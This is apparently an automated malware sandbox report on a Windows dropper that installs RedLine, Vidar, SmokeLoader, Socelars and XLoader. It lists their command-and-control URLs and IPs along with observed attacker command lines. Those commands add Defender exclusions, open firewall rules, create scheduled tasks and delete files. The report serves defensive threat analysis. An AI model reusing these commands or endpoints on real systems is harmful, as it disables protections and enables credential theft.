Overview
overview
10Static
static
01a53007f9...68.exe
windows7_x64
1001a53007f9...68.exe
windows10_x64
10022e3c30a1...66.exe
windows7_x64
10022e3c30a1...66.exe
windows10_x64
1002ca2b5bb7...35.exe
windows7_x64
1002ca2b5bb7...35.exe
windows10_x64
100d69cafe70...cd.exe
windows7_x64
100d69cafe70...cd.exe
windows10_x64
100df647f0a2...bc.exe
windows7_x64
100df647f0a2...bc.exe
windows10_x64
101df367eead...2c.exe
windows7_x64
101df367eead...2c.exe
windows10_x64
101e083736ae...33.exe
windows7_x64
101e083736ae...33.exe
windows10_x64
101e662d9025...7d.exe
windows7_x64
101e662d9025...7d.exe
windows10_x64
102010009ff5...59.exe
windows7_x64
102010009ff5...59.exe
windows10_x64
10243379992d...93.exe
windows7_x64
10243379992d...93.exe
windows10_x64
102d63a14e4a...1a.exe
windows7_x64
102d63a14e4a...1a.exe
windows10_x64
1030e6815ae0...51.exe
windows7_x64
130e6815ae0...51.exe
windows10_x64
1364d3b0e94...fa.exe
windows7_x64
10364d3b0e94...fa.exe
windows10_x64
103a4e2dfbd7...00.exe
windows7_x64
103a4e2dfbd7...00.exe
windows10_x64
104a4a606501...75.exe
windows7_x64
104a4a606501...75.exe
windows10_x64
104d89b00768...c0.exe
windows7_x64
104d89b00768...c0.exe
windows10_x64
10Analysis
-
max time kernel
78s -
max time network
206s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
09-11-2021 13:19
Static task
static1
Behavioral task
behavioral1
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win10-en-20211104
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211014
Behavioral task
behavioral4
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211104
Behavioral task
behavioral5
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win7-en-20211014
Behavioral task
behavioral6
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win7-en-20211104
Behavioral task
behavioral8
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win7-en-20211104
Behavioral task
behavioral10
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win10-en-20211014
Behavioral task
behavioral11
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win7-en-20211104
Behavioral task
behavioral12
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win10-en-20211014
Behavioral task
behavioral13
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win7-en-20211104
Behavioral task
behavioral14
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win10-en-20211104
Behavioral task
behavioral15
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win7-en-20211014
Behavioral task
behavioral16
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win10-en-20211104
Behavioral task
behavioral17
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win7-en-20211014
Behavioral task
behavioral18
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win10-en-20211104
Behavioral task
behavioral19
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win7-en-20211014
Behavioral task
behavioral20
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win10-en-20211104
Behavioral task
behavioral21
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win7-en-20211104
Behavioral task
behavioral22
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win10-en-20211014
Behavioral task
behavioral23
Sample
30e6815ae008a8638c5b30460098904121e0b98c7e87784d950f1dc55aafec51.exe
Resource
win7-en-20211104
Behavioral task
behavioral24
Sample
30e6815ae008a8638c5b30460098904121e0b98c7e87784d950f1dc55aafec51.exe
Resource
win10-en-20211014
Behavioral task
behavioral25
Sample
364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe
Resource
win7-en-20211104
Behavioral task
behavioral26
Sample
364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe
Resource
win10-en-20211014
Behavioral task
behavioral27
Sample
3a4e2dfbd7943c7200d7c5ea70c2b0117408d3c1ac3cac7b757d8e05dcc9ff00.exe
Resource
win7-en-20211104
Behavioral task
behavioral28
Sample
3a4e2dfbd7943c7200d7c5ea70c2b0117408d3c1ac3cac7b757d8e05dcc9ff00.exe
Resource
win10-en-20211014
Behavioral task
behavioral29
Sample
4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe
Resource
win7-en-20211104
Behavioral task
behavioral30
Sample
4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe
Resource
win10-en-20211104
Behavioral task
behavioral31
Sample
4d89b007686d09c5143127f408435b76d2ea36991b728985ac47dcf797e6e7c0.exe
Resource
win7-en-20211014
General
-
Target
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
-
Size
3.9MB
-
MD5
e04c606d6936962fe40913b1654410d8
-
SHA1
37a7a94ea89f4697ad779a43c907deef4fd04f89
-
SHA256
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a
-
SHA512
a98c183a3b9b4cc34544f9cd1ba5ba4a41595ce06d21e0ae2598adc96096411e94a09e3ef72bdc49f7a74b2d58bd7274e041eee2c4d3cee6f2476b3c000c8ba2
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.znsjis.top/
Extracted
redline
she
135.181.129.119:4805
Extracted
redline
ANI
45.142.215.47:27643
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
vidar
48.1
937
-
profile_id
937
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4188 1496 rundll32.exe 114 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral22/memory/1144-223-0x0000000003550000-0x000000000356F000-memory.dmp family_redline behavioral22/memory/1144-226-0x0000000003760000-0x000000000377D000-memory.dmp family_redline behavioral22/memory/4008-237-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral22/memory/4008-239-0x000000000041B23A-mapping.dmp family_redline behavioral22/files/0x000400000001ac31-339.dat family_redline behavioral22/files/0x000400000001ac31-340.dat family_redline behavioral22/memory/3952-513-0x0000000000588D4A-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral22/files/0x000400000001abf2-166.dat family_socelars behavioral22/files/0x000400000001abf2-187.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral22/memory/816-381-0x0000000002160000-0x0000000002235000-memory.dmp family_vidar behavioral22/memory/816-382-0x0000000000400000-0x00000000004D8000-memory.dmp family_vidar -
Xloader Payload 2 IoCs
resource yara_rule behavioral22/files/0x000400000001ac4c-403.dat xloader behavioral22/files/0x000400000001ac4c-404.dat xloader -
resource yara_rule behavioral22/files/0x000500000001ab9c-128.dat aspack_v212_v242 behavioral22/files/0x000500000001ab9c-127.dat aspack_v212_v242 behavioral22/files/0x000500000001abe4-126.dat aspack_v212_v242 behavioral22/files/0x000400000001abe6-133.dat aspack_v212_v242 behavioral22/files/0x000400000001abe6-132.dat aspack_v212_v242 behavioral22/files/0x000500000001abe4-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
pid Process 2660 setup_installer.exe 1116 setup_install.exe 2688 Sun12fa00cf9c.exe 1488 Sun1259934706c8.exe 2224 Sun12c1348d93153.exe 4004 Sun12d5375519fd3042a.exe 3208 Sun12f38be2ba.exe 3056 Sun12da668880c641f.exe 2816 Sun1216aa44861b6.exe 1144 Sun12e7ce43242.exe 1900 Sun123ea6485e74.exe 1316 Sun120905af9b0.exe 3800 Sun12ae5f6f719fe11fb.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 5 IoCs
pid Process 1116 setup_install.exe 1116 setup_install.exe 1116 setup_install.exe 1116 setup_install.exe 1116 setup_install.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral22/files/0x000400000001ac33-349.dat themida behavioral22/files/0x000400000001ac4d-376.dat themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 57 api.db-ip.com 211 ipinfo.io 212 ipinfo.io 214 api.db-ip.com 31 ip-api.com 52 ipinfo.io 53 ipinfo.io 56 api.db-ip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
pid pid_target Process procid_target 3792 1116 WerFault.exe 70 3716 3800 WerFault.exe 99 68 2816 WerFault.exe 94 2164 2816 WerFault.exe 94 4304 2816 WerFault.exe 94 4496 2816 WerFault.exe 94 3580 2816 WerFault.exe 94 4632 2816 WerFault.exe 94 4312 2816 WerFault.exe 94 4788 4024 WerFault.exe 151 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun12f38be2ba.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun12f38be2ba.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun12f38be2ba.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5652 schtasks.exe 5644 schtasks.exe 816 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3152 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 2936 taskkill.exe 3464 taskkill.exe 5804 taskkill.exe 5328 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 32 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 3792 WerFault.exe 2220 powershell.exe 3208 Sun12f38be2ba.exe 3208 Sun12f38be2ba.exe 2220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
description pid Process Token: SeCreateTokenPrivilege 3056 Sun12da668880c641f.exe Token: SeAssignPrimaryTokenPrivilege 3056 Sun12da668880c641f.exe Token: SeLockMemoryPrivilege 3056 Sun12da668880c641f.exe Token: SeIncreaseQuotaPrivilege 3056 Sun12da668880c641f.exe Token: SeMachineAccountPrivilege 3056 Sun12da668880c641f.exe Token: SeTcbPrivilege 3056 Sun12da668880c641f.exe Token: SeSecurityPrivilege 3056 Sun12da668880c641f.exe Token: SeTakeOwnershipPrivilege 3056 Sun12da668880c641f.exe Token: SeLoadDriverPrivilege 3056 Sun12da668880c641f.exe Token: SeSystemProfilePrivilege 3056 Sun12da668880c641f.exe Token: SeSystemtimePrivilege 3056 Sun12da668880c641f.exe Token: SeProfSingleProcessPrivilege 3056 Sun12da668880c641f.exe Token: SeIncBasePriorityPrivilege 3056 Sun12da668880c641f.exe Token: SeCreatePagefilePrivilege 3056 Sun12da668880c641f.exe Token: SeCreatePermanentPrivilege 3056 Sun12da668880c641f.exe Token: SeBackupPrivilege 3056 Sun12da668880c641f.exe Token: SeRestorePrivilege 3056 Sun12da668880c641f.exe Token: SeShutdownPrivilege 3056 Sun12da668880c641f.exe Token: SeDebugPrivilege 3056 Sun12da668880c641f.exe Token: SeAuditPrivilege 3056 Sun12da668880c641f.exe Token: SeSystemEnvironmentPrivilege 3056 Sun12da668880c641f.exe Token: SeChangeNotifyPrivilege 3056 Sun12da668880c641f.exe Token: SeRemoteShutdownPrivilege 3056 Sun12da668880c641f.exe Token: SeUndockPrivilege 3056 Sun12da668880c641f.exe Token: SeSyncAgentPrivilege 3056 Sun12da668880c641f.exe Token: SeEnableDelegationPrivilege 3056 Sun12da668880c641f.exe Token: SeManageVolumePrivilege 3056 Sun12da668880c641f.exe Token: SeImpersonatePrivilege 3056 Sun12da668880c641f.exe Token: SeCreateGlobalPrivilege 3056 Sun12da668880c641f.exe Token: 31 3056 Sun12da668880c641f.exe Token: 32 3056 Sun12da668880c641f.exe Token: 33 3056 Sun12da668880c641f.exe Token: 34 3056 Sun12da668880c641f.exe Token: 35 3056 Sun12da668880c641f.exe Token: SeDebugPrivilege 4004 Sun12d5375519fd3042a.exe Token: SeRestorePrivilege 3792 WerFault.exe Token: SeBackupPrivilege 3792 WerFault.exe Token: SeDebugPrivilege 3800 Sun12ae5f6f719fe11fb.exe Token: SeDebugPrivilege 3792 WerFault.exe Token: SeDebugPrivilege 2220 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3032 wrote to memory of 2660 3032 2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe 69 PID 3032 wrote to memory of 2660 3032 2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe 69 PID 3032 wrote to memory of 2660 3032 2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe 69 PID 2660 wrote to memory of 1116 2660 setup_installer.exe 70 PID 2660 wrote to memory of 1116 2660 setup_installer.exe 70 PID 2660 wrote to memory of 1116 2660 setup_installer.exe 70 PID 1116 wrote to memory of 1204 1116 setup_install.exe 75 PID 1116 wrote to memory of 1204 1116 setup_install.exe 75 PID 1116 wrote to memory of 1204 1116 setup_install.exe 75 PID 1116 wrote to memory of 944 1116 setup_install.exe 76 PID 1116 wrote to memory of 944 1116 setup_install.exe 76 PID 1116 wrote to memory of 944 1116 setup_install.exe 76 PID 1116 wrote to memory of 980 1116 setup_install.exe 77 PID 1116 wrote to memory of 980 1116 setup_install.exe 77 PID 1116 wrote to memory of 980 1116 setup_install.exe 77 PID 1116 wrote to memory of 1056 1116 setup_install.exe 78 PID 1116 wrote to memory of 1056 1116 setup_install.exe 78 PID 1116 wrote to memory of 1056 1116 setup_install.exe 78 PID 1116 wrote to memory of 2188 1116 setup_install.exe 79 PID 1116 wrote to memory of 2188 1116 setup_install.exe 79 PID 1116 wrote to memory of 2188 1116 setup_install.exe 79 PID 1116 wrote to memory of 1172 1116 setup_install.exe 80 PID 1116 wrote to memory of 1172 1116 setup_install.exe 80 PID 1116 wrote to memory of 1172 1116 setup_install.exe 80 PID 1116 wrote to memory of 2992 1116 setup_install.exe 81 PID 1116 wrote to memory of 2992 1116 setup_install.exe 81 PID 1116 wrote to memory of 2992 1116 setup_install.exe 81 PID 1116 wrote to memory of 1512 1116 setup_install.exe 98 PID 1116 wrote to memory of 1512 1116 setup_install.exe 98 PID 1116 wrote to memory of 1512 1116 setup_install.exe 98 PID 2188 wrote to memory of 2688 2188 cmd.exe 97 PID 2188 wrote to memory of 2688 2188 cmd.exe 97 PID 2188 wrote to memory of 2688 2188 cmd.exe 97 PID 1116 wrote to memory of 1524 1116 setup_install.exe 95 PID 1116 wrote to memory of 1524 1116 setup_install.exe 95 PID 1116 wrote to memory of 1524 1116 setup_install.exe 95 PID 980 wrote to memory of 1488 980 cmd.exe 96 PID 980 wrote to memory of 1488 980 cmd.exe 96 PID 980 wrote to memory of 1488 980 cmd.exe 96 PID 1204 wrote to memory of 2220 1204 cmd.exe 82 PID 1204 wrote to memory of 2220 1204 cmd.exe 82 PID 1204 wrote to memory of 2220 1204 cmd.exe 82 PID 944 wrote to memory of 2224 944 cmd.exe 85 PID 944 wrote to memory of 2224 944 cmd.exe 85 PID 944 wrote to memory of 2224 944 cmd.exe 85 PID 1116 wrote to memory of 1504 1116 setup_install.exe 84 PID 1116 wrote to memory of 1504 1116 setup_install.exe 84 PID 1116 wrote to memory of 1504 1116 setup_install.exe 84 PID 1116 wrote to memory of 1984 1116 setup_install.exe 83 PID 1116 wrote to memory of 1984 1116 setup_install.exe 83 PID 1116 wrote to memory of 1984 1116 setup_install.exe 83 PID 1056 wrote to memory of 4004 1056 cmd.exe 88 PID 1056 wrote to memory of 4004 1056 cmd.exe 88 PID 1116 wrote to memory of 2120 1116 setup_install.exe 87 PID 1116 wrote to memory of 2120 1116 setup_install.exe 87 PID 1116 wrote to memory of 2120 1116 setup_install.exe 87 PID 1172 wrote to memory of 3208 1172 cmd.exe 86 PID 1172 wrote to memory of 3208 1172 cmd.exe 86 PID 1172 wrote to memory of 3208 1172 cmd.exe 86 PID 1524 wrote to memory of 3056 1524 cmd.exe 89 PID 1524 wrote to memory of 3056 1524 cmd.exe 89 PID 1524 wrote to memory of 3056 1524 cmd.exe 89 PID 2992 wrote to memory of 2816 2992 cmd.exe 94 PID 2992 wrote to memory of 2816 2992 cmd.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe"C:\Users\Admin\AppData\Local\Temp\2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12c1348d93153.exe4⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12c1348d93153.exeSun12c1348d93153.exe5⤵
- Executes dropped EXE
PID:2224 -
C:\Users\Admin\Pictures\Adobe Films\xFlgB4Za99swS90uhoBEsUeg.exe"C:\Users\Admin\Pictures\Adobe Films\xFlgB4Za99swS90uhoBEsUeg.exe"6⤵PID:2632
-
-
C:\Users\Admin\Pictures\Adobe Films\KJK03Ni1uFoeb0_VTmHTG6Ou.exe"C:\Users\Admin\Pictures\Adobe Films\KJK03Ni1uFoeb0_VTmHTG6Ou.exe"6⤵PID:3148
-
C:\Users\Admin\Documents\o77BvoF8F8H3x9Tfohbo1rNl.exe"C:\Users\Admin\Documents\o77BvoF8F8H3x9Tfohbo1rNl.exe"7⤵PID:5392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5652
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5644
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yzrfCPgAsCbdOBJe86cBYrEP.exe"C:\Users\Admin\Pictures\Adobe Films\yzrfCPgAsCbdOBJe86cBYrEP.exe"6⤵PID:956
-
-
C:\Users\Admin\Pictures\Adobe Films\KFMIiIwz3xbIfB7RnPos0d1z.exe"C:\Users\Admin\Pictures\Adobe Films\KFMIiIwz3xbIfB7RnPos0d1z.exe"6⤵PID:4308
-
-
C:\Users\Admin\Pictures\Adobe Films\dUadqlOujg5OCCqRcHGxkRoy.exe"C:\Users\Admin\Pictures\Adobe Films\dUadqlOujg5OCCqRcHGxkRoy.exe"6⤵PID:816
-
-
C:\Users\Admin\Pictures\Adobe Films\7erBk_I1otVlnu6TrdtPTtCv.exe"C:\Users\Admin\Pictures\Adobe Films\7erBk_I1otVlnu6TrdtPTtCv.exe"6⤵PID:3628
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "7erBk_I1otVlnu6TrdtPTtCv.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\7erBk_I1otVlnu6TrdtPTtCv.exe" & exit7⤵PID:5400
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "7erBk_I1otVlnu6TrdtPTtCv.exe" /f8⤵
- Kills process with taskkill
PID:5804
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hCh5SqqQiwpwNGZfbw0Db5l3.exe"C:\Users\Admin\Pictures\Adobe Films\hCh5SqqQiwpwNGZfbw0Db5l3.exe"6⤵PID:1936
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵PID:4672
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TsGYWYHaAmFHKldYAx_XE0KU.exe"C:\Users\Admin\Pictures\Adobe Films\TsGYWYHaAmFHKldYAx_XE0KU.exe"6⤵PID:1508
-
-
C:\Users\Admin\Pictures\Adobe Films\9UwF7RHQbz6ZJ7cgtG3U5ayY.exe"C:\Users\Admin\Pictures\Adobe Films\9UwF7RHQbz6ZJ7cgtG3U5ayY.exe"6⤵PID:4648
-
-
C:\Users\Admin\Pictures\Adobe Films\YV5DwoScdoQ2Kd08qX5SIT_o.exe"C:\Users\Admin\Pictures\Adobe Films\YV5DwoScdoQ2Kd08qX5SIT_o.exe"6⤵PID:4928
-
-
C:\Users\Admin\Pictures\Adobe Films\tfugKKePr2LiLXXzD0UhT8At.exe"C:\Users\Admin\Pictures\Adobe Films\tfugKKePr2LiLXXzD0UhT8At.exe"6⤵PID:1100
-
-
C:\Users\Admin\Pictures\Adobe Films\RzcTxK6cd9S73eHgTd8njwEX.exe"C:\Users\Admin\Pictures\Adobe Films\RzcTxK6cd9S73eHgTd8njwEX.exe"6⤵PID:5028
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\RzcTxK6cd9S73eHgTd8njwEX.exe" & exit7⤵PID:4668
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
PID:3152
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6TFHlFY0k4iDobcST87y2qhV.exe"C:\Users\Admin\Pictures\Adobe Films\6TFHlFY0k4iDobcST87y2qhV.exe"6⤵PID:2368
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵PID:5176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵PID:5472
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:5904
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:4572
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
PID:816
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵PID:3676
-
-
-
C:\Users\Admin\Pictures\Adobe Films\39txMBiTMV_KtjhZXLKp2lXT.exe"C:\Users\Admin\Pictures\Adobe Films\39txMBiTMV_KtjhZXLKp2lXT.exe"6⤵PID:1804
-
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe7⤵PID:1656
-
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"8⤵PID:5124
-
-
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe7⤵PID:4024
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:3952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 5528⤵
- Program crash
PID:4788
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Xak840eyxFNrItr5jx7GltOy.exe"C:\Users\Admin\Pictures\Adobe Films\Xak840eyxFNrItr5jx7GltOy.exe"6⤵PID:4324
-
C:\Users\Admin\Pictures\Adobe Films\Xak840eyxFNrItr5jx7GltOy.exe"C:\Users\Admin\Pictures\Adobe Films\Xak840eyxFNrItr5jx7GltOy.exe"7⤵PID:5108
-
-
-
C:\Users\Admin\Pictures\Adobe Films\V52hI9Enje6nDetyQrz8AlkB.exe"C:\Users\Admin\Pictures\Adobe Films\V52hI9Enje6nDetyQrz8AlkB.exe"6⤵PID:2196
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:5960
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:5328
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6__g9HjU1JzBgP036rXE7gZY.exe"C:\Users\Admin\Pictures\Adobe Films\6__g9HjU1JzBgP036rXE7gZY.exe"6⤵PID:1648
-
-
C:\Users\Admin\Pictures\Adobe Films\U8oL3G08uOszHKS5CcuQg0lL.exe"C:\Users\Admin\Pictures\Adobe Films\U8oL3G08uOszHKS5CcuQg0lL.exe"6⤵PID:3564
-
-
